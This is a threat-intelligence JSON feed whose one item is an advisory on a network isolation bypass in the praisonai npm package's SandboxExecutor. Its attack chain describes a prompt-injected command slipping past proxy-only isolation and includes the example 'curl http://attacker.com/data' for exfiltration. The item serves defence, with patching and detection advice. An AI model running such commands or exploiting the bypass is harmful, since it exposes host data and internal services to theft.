{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/network-bypass/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["praisonai (\u003e= 1.2.3, \u003c= 1.7.1)"],"_cs_severities":["high"],"_cs_tags":["vulnerability","npm","sandbox","network-bypass","ghsa"],"_cs_type":"threat","_cs_vendors":["MervinPraison"],"content_html":"\u003cp\u003eThe npm package \u003ccode\u003epraisonai\u003c/code\u003e, specifically versions 1.2.3 up to and including 1.7.1, is affected by a critical network isolation bypass vulnerability identified as GHSA-gqmf-56h7-rrpf. The \u003ccode\u003eSandboxExecutor\u003c/code\u003e component in \u003ccode\u003enetwork-isolated\u003c/code\u003e mode, which is advertised to provide \u0026quot;No network access,\u0026quot; fails to implement robust OS-level network restrictions. Instead, it only injects proxy environment variables (e.g., \u003ccode\u003ehttp_proxy\u003c/code\u003e, \u003ccode\u003ehttps_proxy\u003c/code\u003e set to \u003ccode\u003elocalhost:0\u003c/code\u003e) into the child processes. This mechanism is insufficient for true network isolation, as any non-proxy-aware client or direct socket API call within the sandboxed command environment will bypass these variables and establish direct network connections. This flaw undermines the security guarantees applications rely on when executing untrusted or user-supplied code via \u003ccode\u003epraisonai\u003c/code\u003e, potentially enabling attackers to exfiltrate sensitive data or access internal network resources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts malicious input, such as a prompt-injected command, and submits it to an application utilizing the \u003ccode\u003epraisonai\u003c/code\u003e library.\u003c/li\u003e\n\u003cli\u003eThe vulnerable application executes the attacker-supplied command within the \u003ccode\u003eSandboxExecutor\u003c/code\u003e component, configured for \u003ccode\u003enetwork-isolated\u003c/code\u003e mode.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eSandboxExecutor\u003c/code\u003e spawns a child process (e.g., \u003ccode\u003esh -c [attacker_controlled_command]\u003c/code\u003e), inheriting environment variables like \u003ccode\u003ehttp_proxy=http://localhost:0\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled command, for instance, \u003ccode\u003ecurl http://attacker.com/data\u003c/code\u003e, executes a non-proxy-aware network client or direct socket API call.\u003c/li\u003e\n\u003cli\u003eThe non-proxy-aware client or API ignores the injected proxy environment variables and attempts to establish a direct outbound network connection.\u003c/li\u003e\n\u003cli\u003eThe operating system permits the direct connection, effectively bypassing the intended \u003ccode\u003enetwork-isolated\u003c/code\u003e sandbox boundary.\u003c/li\u003e\n\u003cli\u003eThe attacker's command successfully exfiltrates data from the compromised environment or accesses internal network services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe network isolation bypass in \u003ccode\u003epraisonai\u003c/code\u003e can lead to severe consequences for applications relying on its sandbox for security. If exploited, attackers can circumvent the intended network restrictions to exfiltrate sensitive data (e.g., local files, process output, environment variables) from the sandboxed command context. Furthermore, this vulnerability allows access to localhost services or internal network resources reachable from the host running the \u003ccode\u003epraisonai\u003c/code\u003e instance, potentially enabling lateral movement or further compromise. It can also permit requests to cloud metadata or service endpoints, leading to credential theft or escalation of privileges. Ultimately, the flaw enables bypass of application policies that assume command execution occurs without network access, compromising the integrity and confidentiality of the host system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePatch CVE-GHSA-gqmf-56h7-rrpf immediately\u003c/strong\u003e by upgrading the \u003ccode\u003epraisonai\u003c/code\u003e npm package to a version that contains a fix, or implement a workaround that employs OS-level network restrictions.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeploy the Sigma rules in this brief to your SIEM\u003c/strong\u003e to detect suspicious network utility execution originating from processes likely spawned by \u003ccode\u003epraisonai\u003c/code\u003e's \u003ccode\u003eSandboxExecutor\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEnable \u003ccode\u003eprocess_creation\u003c/code\u003e logging for all Linux servers\u003c/strong\u003e that run applications using the \u003ccode\u003epraisonai\u003c/code\u003e package to capture \u003ccode\u003esh\u003c/code\u003e, \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003enode\u003c/code\u003e, and \u003ccode\u003epython\u003c/code\u003e command line arguments.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReview \u003ccode\u003enetwork_connection\u003c/code\u003e logs\u003c/strong\u003e from systems using \u003ccode\u003epraisonai\u003c/code\u003e for outbound connections initiated by non-standard or unexpected processes to external or internal destinations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T15:06:26Z","date_published":"2026-06-18T15:06:26Z","id":"https://feed.craftedsignal.io/briefs/2026-06-npm-praisonai-network-bypass/","summary":"The npm package `praisonai` versions 1.2.3 through 1.7.1 contain a network isolation bypass vulnerability (GHSA-gqmf-56h7-rrpf) in its `SandboxExecutor` component's `network-isolated` mode, allowing non-proxy-aware client commands to establish direct network connections, leading to potential data exfiltration and access to internal services.","title":"npm PraisonAI SandboxExecutor Network Isolation Bypass Vulnerability (GHSA-gqmf-56h7-rrpf)","url":"https://feed.craftedsignal.io/briefs/2026-06-npm-praisonai-network-bypass/"}],"language":"en","title":"CraftedSignal Threat Feed - Network-Bypass","version":"https://jsonfeed.org/version/1.1"}